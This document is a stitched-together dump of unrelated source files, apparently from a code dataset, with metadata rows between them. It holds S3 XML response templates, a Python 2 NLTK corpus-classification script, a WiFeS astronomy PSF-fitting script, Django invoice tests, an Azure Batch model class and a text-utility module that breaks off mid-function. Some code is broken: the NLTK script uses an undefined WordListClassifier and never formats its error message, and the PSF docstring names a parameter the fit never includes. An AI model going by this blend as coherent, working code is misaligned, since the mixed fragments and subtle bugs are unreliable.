<AllowedOrigin>{{ origin }}</AllowedOrigin>
{% endfor %}
{% for method in cors.allowed_methods %}
<AllowedMethod>{{ method }}</AllowedMethod>
{% endfor %}
{% if cors.allowed_headers is not none %}
{% for header in cors.allowed_headers %}
<AllowedHeader>{{ header }}</AllowedHeader>
{% endfor %}
{% endif %}
{% if cors.exposed_headers is not none %}
{% for header in cors.exposed_headers %}
<ExposedHeader>{{ header }}</ExposedHeader>
{% endfor %}
{% endif %}
{% if cors.max_age_seconds is not none %}
<MaxAgeSeconds>{{ cors.max_age_seconds }}</MaxAgeSeconds>
{% endif %}
</CORSRule>
{% endfor %}
</CORSConfiguration>
"""
S3_OBJECT_COPY_RESPONSE = """\
<CopyObjectResult xmlns="http://doc.s3.amazonaws.com/2006-03-01">
<ETag>{{ key.etag }}</ETag>
<LastModified>{{ key.last_modified_ISO8601 }}</LastModified>
</CopyObjectResult>"""
S3_MULTIPART_INITIATE_RESPONSE = """<?xml version="1.0" encoding="UTF-8"?>
<InitiateMultipartUploadResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
<Bucket>{{ bucket_name }}</Bucket>
<Key>{{ key_name }}</Key>
<UploadId>{{ upload_id }}</UploadId>
</InitiateMultipartUploadResult>"""
S3_MULTIPART_UPLOAD_RESPONSE = """<?xml version="1.0" encoding="UTF-8"?>
<CopyPartResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
<LastModified>{{ part.last_modified_ISO8601 }}</LastModified>
<ETag>{{ part.etag }}</ETag>
</CopyPartResult>"""
S3_MULTIPART_LIST_RESPONSE = """<?xml version="1.0" encoding="UTF-8"?>
<ListPartsResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
<Bucket>{{ bucket_name }}</Bucket>
<Key>{{ key_name }}</Key>
<UploadId>{{ upload_id }}</UploadId>
<StorageClass>STANDARD</StorageClass>
<Initiator>
<ID>75aa57f09aa0c8caeab4f8c24e99d10f8e7faeebf76c078efc7c6caea54ba06a</ID>
<DisplayName>webfile</DisplayName>
</Initiator>
<Owner>
<ID>75aa57f09aa0c8caeab4f8c24e99d10f8e7faeebf76c078efc7c6caea54ba06a</ID>
<DisplayName>webfile</DisplayName>
</Owner>
<StorageClass>STANDARD</StorageClass>
<PartNumberMarker>1</PartNumberMarker>
<NextPartNumberMarker>{{ count }} </NextPartNumberMarker>
<MaxParts>{{ count }}</MaxParts>
<IsTruncated>false</IsTruncated>
{% for part in parts %}
<Part>
<PartNumber>{{ part.name }}</PartNumber>
<LastModified>{{ part.last_modified_ISO8601 }}</LastModified>
<ETag>{{ part.etag }}</ETag>
<Size>{{ part.size }}</Size>
</Part>
{% endfor %}
</ListPartsResult>"""
S3_MULTIPART_COMPLETE_RESPONSE = """<?xml version="1.0" encoding="UTF-8"?>
<CompleteMultipartUploadResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
<Location>http://{{ bucket_name }}.s3.amazonaws.com/{{ key_name }}</Location>
<Bucket>{{ bucket_name }}</Bucket>
<Key>{{ key_name }}</Key>
<ETag>{{ etag }}</ETag>
</CompleteMultipartUploadResult>
"""
S3_ALL_MULTIPARTS = """<?xml version="1.0" encoding="UTF-8"?>
<ListMultipartUploadsResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
<Bucket>{{ bucket_name }}</Bucket>
<KeyMarker></KeyMarker>
<UploadIdMarker></UploadIdMarker>
<MaxUploads>1000</MaxUploads>
<IsTruncated>False</IsTruncated>
{% for upload in uploads %}
<Upload>
<Key>{{ upload.key_name }}</Key>
<UploadId>{{ upload.id }}</UploadId>
<Initiator>
<ID>arn:aws:iam::123456789012:user/user1-11111a31-17b5-4fb7-9df5-b111111f13de</ID>
<DisplayName>user1-11111a31-17b5-4fb7-9df5-b111111f13de</DisplayName>
</Initiator>
<Owner>
<ID>75aa57f09aa0c8caeab4f8c24e99d10f8e7faeebf76c078efc7c6caea54ba06a</ID>
<DisplayName>webfile</DisplayName>
</Owner>
<StorageClass>STANDARD</StorageClass>
<Initiated>2010-11-10T20:48:33.000Z</Initiated>
</Upload>
{% endfor %}
</ListMultipartUploadsResult>
"""
S3_NO_POLICY = """<?xml version="1.0" encoding="UTF-8"?>
<Error>
<Code>NoSuchBucketPolicy</Code>
<Message>The bucket policy does not exist</Message>
<BucketName>{{ bucket_name }}</BucketName>
<RequestId>0D68A23BB2E2215B</RequestId>
<HostId>9Gjjt1m+cjU4OPvX9O9/8RuvnG41MRb/18Oux2o5H5MY7ISNTlXN+Dz9IG62/ILVxhAGI0qyPfg=</HostId>
</Error>
"""
S3_NO_LIFECYCLE = """<?xml version="1.0" encoding="UTF-8"?>
<Error>
<Code>NoSuchLifecycleConfiguration</Code>
<Message>The lifecycle configuration does not exist</Message>
<BucketName>{{ bucket_name }}</BucketName>
<RequestId>44425877V1D0A2F9</RequestId>
<HostId>9Gjjt1m+cjU4OPvX9O9/8RuvnG41MRb/18Oux2o5H5MY7ISNTlXN+Dz9IG62/ILVxhAGI0qyPfg=</HostId>
</Error>
"""
S3_NO_BUCKET_TAGGING = """<?xml version="1.0" encoding="UTF-8"?>
<Error>
<Code>NoSuchTagSet</Code>
<Message>The TagSet does not exist</Message>
<BucketName>{{ bucket_name }}</BucketName>
<RequestId>44425877V1D0A2F9</RequestId>
<HostId>9Gjjt1m+cjU4OPvX9O9/8RuvnG41MRb/18Oux2o5H5MY7ISNTlXN+Dz9IG62/ILVxhAGI0qyPfg=</HostId>
</Error>
"""
S3_NO_BUCKET_WEBSITE_CONFIG = """<?xml version="1.0" encoding="UTF-8"?>
<Error>
<Code>NoSuchWebsiteConfiguration</Code>
<Message>The specified bucket does not have a website configuration</Message>
<BucketName>{{ bucket_name }}</BucketName>
<RequestId>44425877V1D0A2F9</RequestId>
<HostId>9Gjjt1m+cjU4OPvX9O9/8RuvnG41MRb/18Oux2o5H5MY7ISNTlXN+Dz9IG62/ILVxhAGI0qyPfg=</HostId>
</Error>
"""
S3_INVALID_CORS_REQUEST = """<?xml version="1.0" encoding="UTF-8"?>
<Error>
<Code>NoSuchWebsiteConfiguration</Code>
<Message>The specified bucket does not have a website configuration</Message>
<BucketName>{{ bucket_name }}</BucketName>
<RequestId>44425877V1D0A2F9</RequestId>
<HostId>9Gjjt1m+cjU4OPvX9O9/8RuvnG41MRb/18Oux2o5H5MY7ISNTlXN+Dz9IG62/ILVxhAGI0qyPfg=</HostId>
</Error>
"""
S3_NO_CORS_CONFIG = """<?xml version="1.0" encoding="UTF-8"?>
<Error>
<Code>NoSuchCORSConfiguration</Code>
<Message>The CORS configuration does not exist</Message>
<BucketName>{{ bucket_name }}</BucketName>
<RequestId>44425877V1D0A2F9</RequestId>
<HostId>9Gjjt1m+cjU4OPvX9O9/8RuvnG41MRb/18Oux2o5H5MY7ISNTlXN+Dz9IG62/ILVxhAGI0qyPfg=</HostId>
</Error>
"""
| apache-2.0 | 7,205,346,243,205,726,000 | 38.537975 | 182 | 0.595086 | false |
gicsi/aap | src/machine_learning/nltk-trainer-master/classify_corpus.py | 1 | 6324 | #!/usr/bin/env python
import argparse, itertools, operator, os, os.path, string
import nltk.data
from nltk.corpus import stopwords
from nltk.misc import babelfish
from nltk.tokenize import wordpunct_tokenize
from nltk.util import ngrams
from nltk_trainer import load_corpus_reader, join_words, translate
from nltk_trainer.classification.featx import bag_of_words
langs = [l.lower() for l in babelfish.available_languages]
########################################
## command options & argument parsing ##
########################################
# TODO: many of the args are shared with analyze_classifier_coverage, so abstract
parser = argparse.ArgumentParser(description='Classify a plaintext corpus to a classified corpus')
# TODO: make sure source_corpus can be a single file
parser.add_argument('source_corpus', help='corpus name/path relative to an nltk_data directory')
parser.add_argument('target_corpus', help='corpus name/path relative to an nltk_data directory')
parser.add_argument('--trace', default=1, type=int,
help='How much trace output you want, defaults to 1. 0 is no trace output.')
classifier_group = parser.add_argument_group('Classification Options')
parser.add_argument('--classifier', default=None,
help='pickled classifier name/path relative to an nltk_data directory')
parser.add_argument('--wordlist', default=None,
help='classified word list corpus for word/phrase classification')
parser.add_argument('--threshold', type=float, default=0.9,
help='Minimum probability required to write classified instance')
corpus_group = parser.add_argument_group('Corpus Reader Options')
corpus_group.add_argument('--reader',
default='nltk.corpus.reader.CategorizedPlaintextCorpusReader',
help='Full module path to a corpus reader class, such as %(default)s')
corpus_group.add_argument('--fileids', default=None,
help='Specify fileids to load from corpus')
corpus_group.add_argument('--instances', default='paras', choices=('sents', 'paras'),
help='''the group of words that represents a single training instance,
	the default is %(default)s''')
feat_group = parser.add_argument_group('Feature Extraction',
'The default is to lowercase every word, strip punctuation, and use stopwords')
feat_group.add_argument('--ngrams', action='append', type=int,
help='use n-grams as features.')
feat_group.add_argument('--no-lowercase', action='store_true', default=False,
help="don't lowercase every word")
feat_group.add_argument('--filter-stopwords', default='no',
choices=['no']+stopwords.fileids(),
help='language stopwords to filter, defaults to "no" to keep stopwords')
feat_group.add_argument('--punctuation', action='store_true', default=False,
help="don't strip punctuation")
trans_group = parser.add_argument_group('Language Translation')
trans_group.add_argument('--source', default='english', choices=langs, help='source language')
trans_group.add_argument('--target', default=None, choices=langs, help='target language')
trans_group.add_argument('--retries', default=3, type=int,
help='Number of babelfish retries before quiting')
trans_group.add_argument('--sleep', default=3, type=int,
help='Sleep time between retries')
args = parser.parse_args()
###################
## corpus reader ##
###################
source_corpus = load_corpus_reader(args.source_corpus, args.reader)
if not source_corpus:
raise ValueError('%s is an unknown corpus')
if args.trace:
print 'loaded %s' % args.source_corpus
########################
## text normalization ##
########################
# TODO: copied from analyze_classifier_coverage, so abstract
if args.filter_stopwords == 'no':
stopset = set()
else:
stopset = set(stopwords.words(args.filter_stopwords))
if not args.punctuation:
stopset |= set(string.punctuation)
def norm_words(words):
if not args.no_lowercase:
words = [w.lower() for w in words]
if not args.punctuation:
words = [w.strip(string.punctuation) for w in words]
words = [w for w in words if w]
if stopset:
words = [w for w in words if w.lower() not in stopset]
if args.ngrams:
return reduce(operator.add, [words if n == 1 else ngrams(words, n) for n in args.ngrams])
else:
return words
##############
## classify ##
##############
if args.wordlist:
classifier = WordListClassifier(load_corpus_reader(args.wordlist))
elif args.classifier:
if args.trace:
print 'loading %s' % args.classifier
classifier = nltk.data.load(args.classifier)
else:
raise ValueError('one of wordlist or classifier is needed')
def label_filename(label):
# TODO: better file path based on args.target_corpus & label
path = os.path.join(args.target_corpus, '%s.txt' % label)
if not os.path.exists(args.target_corpus):
os.makedirs(args.target_corpus)
if args.trace:
print 'filename for category %s: %s' % (label, path)
return path
labels = classifier.labels()
label_files = dict([(l, open(label_filename(l), 'a')) for l in labels])
# TODO: create a nltk.corpus.writer framework with some initial CorpusWriter classes
if args.target:
if args.trace:
print 'translating all text from %s to %s' % (args.source, args.target)
featx = lambda words: bag_of_words(norm_words(wordpunct_tokenize(translate(join_words(words),
args.source, args.target, trace=args.trace, sleep=args.sleep, retries=args.retries))))
else:
featx = lambda words: bag_of_words(norm_words(words))
def classify_write(words):
feats = featx(words)
probs = classifier.prob_classify(feats)
label = probs.max()
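	# Only write out instances whose most probable label meets the --threshold probability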
if probs.prob(label) >= args.threshold:
label_files[label].write(join_words(words) + u'\n\n')
if args.trace:
print 'classifying %s' % args.instances
if args.instances == 'paras':
for para in source_corpus.paras():
classify_write(list(itertools.chain(*para)))
else: # args.instances == 'sents'
for sent in source_corpus.sents():
classify_write(sent)
# TODO: arg(s) to specify categorized word list corpus instead of classifier pickle
# can have additional arguments for decision threshold. this will create a
# KeywordClassifier that can be used just like any other NLTK classifier
# TODO: if new corpus files already exist, append to them, and make sure the
# first append example is separate (enough) from the last example in the file
# (we don't want to append a paragraph right next to another paragraph, creating a single paragraph) | gpl-3.0 | 918,427,968,374,105,300 | 35.560694 | 100 | 0.722011 | false |
PyWiFeS/tools | spectroastro2D.py | 1 | 4907 | """
From the 26 March meeting, the plan was:
1) Fix 2D separation and overall R flux ratio. Find best fit PSF.
Issues... the best fit PSF can't just be a Gaussian. It is naturally the convolution of
multiple functional forms, i.e. something that is positive everywhere. On a quick search,
I can't find any obvious parameterisations. Options...
a: Just use the interpolated PSF with a correction for the companion. Problem: we don't
know how to correct for the companion, so will have to do this iteratively.
b: Use a "distortion map".
c: Use a functional form that can be negative and don't worry about details.
2) Extract spectra of A and B components. This is best done with a *good seeing* night and doesn't have to
be done for every data set. Save these spectra.
3) Fix B spectrum, and using the PSFs from step (1) extract the 2D positions of the A and
B components.
Star: GaiaDR2 6110141563309613184
...
is:
2.343 arcsec North
0.472 arcsec East
It is 3.726 mags fainter in Rp.
"""
from __future__ import division, print_function
import numpy as np
import matplotlib.pyplot as plt
import astropy.io.fits as pyfits
import glob
import scipy.optimize as op
import scipy.signal as sig
import time
import multiprocessing
import pdb
plt.ion()
#Settings
multiprocess=False #Setting this for a macbook changes total time from ~9 to ~5 seconds. Only a moderte help!
MIN_PEAK=20
NPSF_PARAMS = 5
WAVE = np.arange(6400.0,7000.0,0.25)
ddir = '/Users/mireland/data/pds70/190225/' #!!! This comes from
#ddir = '/Users/mireland/data/pds70/190225/' #From Marusa's reduction.
fns = np.sort(glob.glob(ddir + '*p11.fits'))
xscale = 1.0 #arcsec/pix
yscale = 0.5 #arcsec/pix
#---------------------------------
#Local function declarations
def PSF(p,x,y,companion_params=None):
"""A simple 2D PSF based on a Gaussian.
Parameters
----------
p: numpy array
Parameters for the PSF.
p[0]: x coordinate offset
p[1]: x coordinate width
p[2]: y coordinate offset
p[3]: y coordinate width
p[4]: Total flux
p[5]: 2nd order symmetric term
x: x coordinate in arcsec.
y: y coordinate in arcsec.
"""
xp = (x-p[0])/p[1]
yp = (y-p[2])/p[3]
    if companion_params is not None:
xp_comp = (x-p[0]-companion_params[1])/p[1]
yp_comp = (y-p[2]-companion_params[2])/p[3]
return p[4]*(np.exp(-(xp**2 + yp**2)/2.0) + companion_params[0]*np.exp(-(xp_comp**2 + yp_comp**2)/2.0))
else:
return p[4]*np.exp(-(xp**2 + yp**2)/2.0)
def PSF_resid(p,x,y,data, gain=1.0, rnoise=3.0):
"Residuals for fitting to a 1D Gaussian"
return ((PSF(p,x,y) - data)/10.).flatten() #np.sqrt(np.maximum(y,0) + rnoise**2)
def lsq_PSF( args ):
"""
Fit a Gaussian to data y(x)
Parameters
----------
args: tuple
guess_p, xfit, yfit
Notes
-----
nline: int
index of this line
guess_center: float
initial guess position
"""
fit = op.least_squares(PSF_resid, args[0], method='lm', \
xtol=1e-04, ftol=1e-4, f_scale=[3.,1.,1.], args=(args[1], args[2], args[3]))
#Check for unphysical solutions and set c_inv to zero for those solutions...
c_inv = fit.jac.T.dot(fit.jac)
return fit.x, c_inv
#---------------------------------
#Main "Script" code
pas = []
mjds = []
fits = []
sigs = []
yx_peak = np.zeros( (len(WAVE), 2), dtype=np.int)
peak_vals = np.zeros( len(WAVE) )
dds = []
#Loop through files and make a 2D fit.
for f in fns[-3:]:
ff = pyfits.open(f)
pas.append(ff[0].header['TELPAN'])
mjds.append(ff[0].header['MJD-OBS'])
dd = ff[0].data[:,8:-8,13:-2]
dds += [dd]
#Subtract off local sky contribution. Could be more sophisticated!
meds = np.median(dd.reshape(dd.shape[0], dd.shape[1]*dd.shape[2]), axis=1).reshape(dd.shape[0],1,1)
dd -= meds
#Find the maxima in every column.
for i in range(len(WAVE)):
yx_peak[i] = np.unravel_index(np.argmax(dd[i]), dd[i].shape)
peak_vals[i] = dd[i, yx_peak[i][0], yx_peak[i][1]]
#Create the x and y arrays
xs, ys = np.meshgrid(np.arange(dd.shape[2])*xscale, np.arange(dd.shape[1])*yscale)
#Now fit to every wavelength
for i in range(len(WAVE)):
fit, sig = lsq_PSF( ([yx_peak[i,1]*xscale,1,yx_peak[i,0]*yscale,1,peak_vals[i]], xs, ys, dd[i]) )
fits += [fit]
sigs += [sig]
fits = np.array(fits)
fits = fits.reshape( (len(fns), len(WAVE), NPSF_PARAMS) )
good = np.where(np.median(fits[:,:,4], axis=1) > 100)[0]
#Now find an average offset as a function of wavelength.
NE_offset = np.zeros( (len(WAVE),2) )
for i in good:
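    # Rotate the fitted x/y offsets by the telescope position angle (TELPAN) into North/East offsets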
NE_offset[:,0] += np.cos(np.radians(pas[i]))*fits[i,:,2] + np.sin(np.radians(pas[i]))*fits[i,:,0]
NE_offset[:,1] += np.cos(np.radians(pas[i]))*fits[i,:,0] - np.sin(np.radians(pas[i]))*fits[i,:,2]
NE_offset /= len(fns)
| mit | 2,472,486,503,515,506,700 | 30.056962 | 111 | 0.619931 | false |
pkimber/invoice | invoice/tests/test_invoice.py | 1 | 4008 | # -*- encoding: utf-8 -*-
import pytest
from decimal import Decimal
from finance.tests.factories import VatSettingsFactory
from invoice.models import Invoice, InvoiceLine
from invoice.service import InvoicePrint
from invoice.tests.factories import (
InvoiceFactory,
InvoiceLineFactory,
InvoiceSettingsFactory,
TimeRecordFactory,
)
@pytest.mark.django_db
def test_create():
""" Create a simple invoice """
invoice = InvoiceFactory()
invoice.full_clean()
invoice.save()
assert invoice.pk > 0
assert invoice.number > 0
@pytest.mark.django_db
def test_create_with_lines():
""" Create a simple invoice with lines """
VatSettingsFactory()
invoice = InvoiceFactory()
line = InvoiceLineFactory(
invoice=invoice,
quantity=Decimal('1.3'),
units='hours',
price=Decimal('300.00'),
)
line = InvoiceLineFactory(
invoice=invoice,
quantity=Decimal('2.4'),
units='hours',
price=Decimal('200.23'),
)
assert invoice.pk > 0
assert Decimal('870.55') == invoice.net
assert Decimal('1044.66') == invoice.gross
assert line.is_credit is False
@pytest.mark.django_db
def test_description():
invoice = InvoiceFactory()
assert 'Invoice' == invoice.description
@pytest.mark.django_db
def test_get_first_line_number():
"""get the number for the first invoice line"""
invoice = InvoiceFactory()
assert 1 == invoice.get_next_line_number()
@pytest.mark.django_db
def test_get_next_line_number():
"""get the number for the next invoice line"""
invoice = InvoiceFactory()
InvoiceLineFactory(invoice=invoice, line_number=1)
InvoiceLineFactory(invoice=invoice, line_number=2)
assert 3 == invoice.get_next_line_number()
@pytest.mark.django_db
def test_get_next_line_number_fill_gap():
"""get the number for the next invoice line"""
invoice = InvoiceFactory()
InvoiceLineFactory(invoice=invoice, line_number=1)
InvoiceLineFactory(invoice=invoice, line_number=2)
InvoiceLineFactory(invoice=invoice, line_number=4)
assert 3 == invoice.get_next_line_number()
@pytest.mark.django_db
def test_get_next_line_number_two_invoices():
"""get the number for the next invoice line"""
invoice_1 = InvoiceFactory()
InvoiceLineFactory(invoice=invoice_1, line_number=1)
InvoiceLineFactory(invoice=invoice_1, line_number=2)
invoice_2 = InvoiceFactory()
InvoiceLineFactory(invoice=invoice_2, line_number=1)
assert 3 == invoice_1.get_next_line_number()
assert 2 == invoice_2.get_next_line_number()
@pytest.mark.django_db
def test_has_lines():
"""does the invoice have any lines"""
invoice = InvoiceFactory()
InvoiceLineFactory(
invoice=invoice,
quantity=Decimal('1.3'),
units='hours',
price=Decimal('300.00'),
)
assert invoice.has_lines is True
@pytest.mark.django_db
def test_has_lines_not():
invoice = InvoiceFactory()
assert invoice.has_lines is False
@pytest.mark.django_db
def test_next_number():
InvoiceFactory(number=99)
assert 100 == Invoice.objects.next_number()
@pytest.mark.django_db
def test_next_number_2():
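    # Deleted invoices (and deleted versions) are ignored when computing the next number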
InvoiceFactory(number=99, deleted=True)
InvoiceFactory(number=98, deleted_version=1)
assert 1 == Invoice.objects.next_number()
@pytest.mark.django_db
def test_user_can_edit():
line = InvoiceLineFactory()
assert line.user_can_edit is True
@pytest.mark.django_db
def test_user_can_edit_has_time():
line = InvoiceLineFactory()
TimeRecordFactory(invoice_line=line)
assert line.user_can_edit is False
@pytest.mark.django_db
def test_user_can_edit_invoice():
InvoiceSettingsFactory()
VatSettingsFactory()
invoice = InvoiceFactory()
line = InvoiceLineFactory(invoice=invoice)
TimeRecordFactory(invoice_line=line)
InvoicePrint().create_pdf(invoice, None)
# refresh
line = InvoiceLine.objects.get(pk=line.pk)
assert line.user_can_edit is False
| apache-2.0 | 9,188,526,177,818,257,000 | 25.899329 | 56 | 0.692365 | false |
AutorestCI/azure-sdk-for-python | azure-batch/azure/batch/models/compute_node_endpoint_configuration.py | 1 | 1092 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class ComputeNodeEndpointConfiguration(Model):
"""The endpoint configuration for the compute node.
:param inbound_endpoints: The list of inbound endpoints that are
accessible on the compute node.
:type inbound_endpoints: list[~azure.batch.models.InboundEndpoint]
"""
_validation = {
'inbound_endpoints': {'required': True},
}
_attribute_map = {
'inbound_endpoints': {'key': 'inboundEndpoints', 'type': '[InboundEndpoint]'},
}
def __init__(self, inbound_endpoints):
self.inbound_endpoints = inbound_endpoints
| mit | -1,403,595,323,034,182,100 | 33.125 | 86 | 0.608059 | false |
quadrismegistus/litlab-poetry | prosodic/treegrid/pytxt.py | 1 | 10492 | import re,os
def yank(text,tag,none=None):
if type(tag)==type(''):
tag=tagname2tagtup(tag)
try:
return text.split(tag[0])[1].split(tag[1])[0]
except IndexError:
return none
def yanks(text,tag):
if type(tag)==type(''):
tag=tagname2tagtup(tag)
return [ x.split(tag[1])[0] for x in text.split(tag[0])[1:] ]
def yanks2(text,tag):
if type(tag)==type(''):
tag=tagname2tagtup(tag)
ys=[]
#return [ tag[0][-1].join(x.split(tag[0][:-1])[1].split(tag[0][-1])[1:]) for x in text.split(tag[1])[:-1] ]
for x in text.split(tag[1])[:-1]:
try:
x=x.split(tag[0][:-1])[1].split(tag[0][-1])[1:]
x=tag[0][-1].join(x)
except IndexError:
pass
ys.append(x)
return ys
def tagname2tagtup(tagname):
return ('<'+tagname+'>','</'+tagname+'>')
def safestr(string):
try:
return str(string)
except UnicodeEncodeError:
return str(string.encode('utf-8','replace'))
except:
return "<????>"
def dict2xml(d,root="xml"):
o=[]
for k,v in sorted(d.items(),reverse=False):
o+=["<"+k+">"+v+"</"+k+">"]
return "<"+root+">\n\t"+ "\n\t".join(o) + "\n</"+root+">"
def neginback(strnum):
if strnum.startswith("-"):
return strnum[1:]+"-"
else:
return strnum
def thetime():
from time import localtime, strftime
return strftime("%Y%m%d.%H%M", localtime())
# these two lists serves as building blocks to construt any number
# just like coin denominations.
# 1000->"M", 900->"CM", 500->"D"...keep on going
decimalDens=[1000,900,500,400,100,90,50,40,10,9,5,4,1]
romanDens=["M","CM","D","CD","C","XC","L","XL","X","IX","V","IV","I"]
def roman(dec):
"""
	Perform a sanity check on the decimal value and raise an exception when necessary
"""
if dec <=0:
raise ValueError, "It must be a positive"
# to avoid MMMM
elif dec>=4000:
raise ValueError, "It must be lower than MMMM(4000)"
return decToRoman(dec,"",decimalDens,romanDens)
def decToRoman(num,s,decs,romans):
"""
convert a Decimal number to Roman numeral recursively
num: the decimal number
	s: the roman numeral string
decs: current list of decimal denomination
romans: current list of roman denomination
"""
if decs:
if (num < decs[0]):
# deal with the rest denomination
return decToRoman(num,s,decs[1:],romans[1:])
else:
			# deduce this denomination till num<decs[0]
return decToRoman(num-decs[0],s+romans[0],decs,romans)
else:
# we run out of denomination, we are done
return s
def ynk(text,start,end,inout=""):
if (not start in text) or (not end in text):
return ""
try:
if (inout=="in" or inout==0):
return text.split(start)[1].split(end)[0]
elif (inout=="out" or inout==1):
return text.split(end)[0].split(start)[-1]
else:
o=[]
for x in text.split(start):
#if x.count(">")>1:
# x=x[x.index(">")+1:]
xx=x.split(end)[0].strip()
if not xx: continue
if xx.startswith("<!DOCTYPE"): continue # NYT hack
if xx.startswith("<NYT_"): continue
if xx.startswith("<script"): continue
o.append(xx.replace("\n"," ").replace("\r"," "))
return "\n\n".join(o)
except:
return ""
def tsv2ld(fn,tsep='\t',nsep='\n'):
f=open(fn,'r')
t=f.read()
t=t.replace('\r\n','\n')
t=t.replace('\r','\n')
f.close()
header=[]
listdict=[]
for line in t.split(nsep):
if not line.strip(): continue
line=line.replace('\n','')
ln=line.split(tsep)
#print ln
if not header:
header=ln
continue
edict={}
for i in range(len(ln)):
k=header[i]
v=ln[i].strip()
if v.startswith('"') and v.endswith('"'):
v=v[1:-1]
edict[k]=v
if edict:
listdict.append(edict)
return listdict
def unhtml(data):
return remove_html_tags(data)
def remove_html_tags(data):
data=safestr(data)
p=re.compile(r'<.*?>')
y=str(p.sub('',data)).strip().split('">')
while(('&' in y) and (';' in y)):
y=y[:y.index('&')]+y[y.index(';')+1:]
try:
return y[1].strip()
except:
return y[0]
def extractTags(text,leavetexttags=[u"placeName"]):
tags=[]
tags_milestone=[]
yankeds=[]
if "</" in text:
for x in text.split("</")[1:]:
tags.append(x.split(">")[0])
if "/>" in text:
for x in text.split("/>")[:-1]:
x=x.split("<")[-1]
try:
x=x.split()[0]
except IndexError:
x=x
#if "/" in x: continue
#if not x: continue
tags_milestone.append(x)
for tag in tags_milestone:
yanked=yank(text,("<"+tag,"/>"))
while yanked.strip():
ydat="<"+tag+yanked+"/>"
#yankeds.append(ydat)
text=text.replace(ydat,' ')
yanked=yank(text,("<"+tag,"/>"))
for tag in tags:
yanked=yank(text,("<"+tag,"</"+tag+">"))
while yanked and yanked.strip():
ydat="<"+tag+yanked+"</"+tag+">"
if tag in leavetexttags:
text=text.replace(ydat,remove_html_tags(yanked.split(">")[-1]))
else:
yankeds.append(ydat)
text=text.replace(ydat,' ')
yanked=yank(text,("<"+tag,"</"+tag+">"))
return (text.replace("\n","").replace("\r",""),yankeds)
def gleanPunc(aToken):
aPunct = None
while(len(aToken) > 0 and not aToken[0].isalnum()):
aPunct = aToken[:1]
aToken = aToken[1:]
while(len(aToken) > 0 and not aToken[-1].isalnum()):
aPunct = aToken[-1]
aToken = aToken[:-1]
return (aToken, aPunct)
def noPunc(token):
x=gleanPunc(token)[0]
x=x.split('&')[0]
y=x.split(';')
try:
x=y[1]
except IndexError:
pass
x=x.split('\\')[0]
return x
def ngram(l,n=3):
grams=[]
gram=[]
for x in l:
gram.append(x)
if len(gram)<n: continue
g=tuple(gram)
grams.append(g)
gram.reverse()
gram.pop()
gram.reverse()
return grams
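# e.g. ngram([1, 2, 3, 4], n=3) -> [(1, 2, 3), (2, 3, 4)]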
def readDict(fn,sep='\t'):
try:
d={}
f=open(fn)
for line in f:
ln=line.split(sep)
k=ln[0].strip()
v=ln[1].strip()
if v.isdigit():
d[k]=int(v)
else:
d[k]=v
if len(d):
return d
else:
return None
except IOError:
return {}
def writeDict(fn,d,sep="\t",toprint=True):
o=""
for k,v in d.items():
o+=sep.join(str(x) for x in [k,v])+"\n"
write(fn,o,toprint)
def extractTagsAsDict(text,leavetexttags=[u"placeName"]):
text,tags=extractTags(text,leavetexttags)
tagdict={}
for tag in tags:
opentag=tag.split(">")[0].split("<")[1].strip()
tagbody=unhtml(tag).strip()
if not tagbody: continue
if " " in opentag:
spaces=opentag.split()
tagname=spaces[0]
for space in spaces[1:2]:
if not space.strip(): continue
dat=space.strip().split("=")
k=dat[0]
try:
v=dat[1]
except:
continue
v=v.replace('"','').replace("'","").strip()
try:
tagdict[tagname][k][v]=tagbody
except KeyError:
try:
tagdict[tagname][k]={}
tagdict[tagname][k][v]=tagbody
except KeyError:
tagdict[tagname]={}
tagdict[tagname][k]={}
tagdict[tagname][k][v]=tagbody
else:
tagname=opentag
tagdict[tagname]=tagbody
return tagdict
def writeToFile(folder,fn,data,extension="tsv"):
#ofolder=os.path.join(folder,'results','stats','corpora',name)
if not os.path.exists(folder):
os.makedirs(folder)
ofn=os.path.join(folder,'.'.join([fn,extension]))
print ">> saved: "+ofn
of = open(ofn,'w')
of.write(data)
of.close()
def write_xls(fn,data,sheetname='index',toprint=True,limFields=None,widths=[]):
import xlwt
wb=xlwt.Workbook(encoding='utf-8')
	if type(data)!=type({}):
dd={}
dd[sheetname]=data
else:
dd=data
for sheetname,data in sorted(dd.items()):
ws=wb.add_sheet(sheetname)
nr=-1
style = xlwt.easyxf('align: wrap True')
#style=xlwt.easyxf('')
for row in data:
nc=-1
nr+=1
for cell in row:
nc+=1
#
# try:
# cell=unicode(cell)
# except UnicodeDecodeError:
# cell=cell.decode('utf-8')
# print cell
if not (type(cell)==type(1) or type(cell)==type(1.0)):
ws.row(nr).set_cell_text(nc,cell,style)
else:
ws.row(nr).set_cell_number(nc,cell,style)
# for i in range(len(widths)):
# w=widths[i]
# if not w: continue
# ws.col(i).width=w
wb.save(fn)
if toprint:
print ">> saved: "+fn
def tmp(data):
import tempfile
f=tempfile.NamedTemporaryFile()
f.write(data)
#f.close()
return f
def write_tmp(data,suffix=''):
import time
fn='/Lab/Processing/tmp/'+str(time.time()).replace('.','')+suffix
write(fn,data)
return fn
def write(fn,data,toprint=False,join_line='\n',join_cell='\t'):
if type(data)==type([]):
o=""
for x in data:
if type(x)==type([]):
z=[]
for y in x:
if type(y)==type(u''):
y=y.encode('utf-8')
z+=[y]
x=z
line=join_cell.join(x)
else:
try:
line=str(x)
except UnicodeEncodeError:
line=x.encode('utf-8')
line=line.replace('\r','').replace('\n','')
o+=line+join_line
else:
o=str(data)
of = open(fn,'w')
of.write(o)
of.close()
if toprint:
print ">> saved: "+fn
def makeminlength(string,numspaces):
if len(string) < numspaces:
for i in range(len(string),numspaces):
string += " "
return string
def get_class( kls ):
parts = kls.split('.')
module = ".".join(parts[:-1])
m = __import__( module )
for comp in parts[1:]:
m = getattr(m, comp)
return m
def gleanPunc(aToken):
aPunct = None
while(len(aToken) > 0 and not aToken[0].isalnum()):
aPunct = aToken[:1]
aToken = aToken[1:]
while(len(aToken) > 0 and not aToken[-1].isalnum()):
aPunct = aToken[-1]
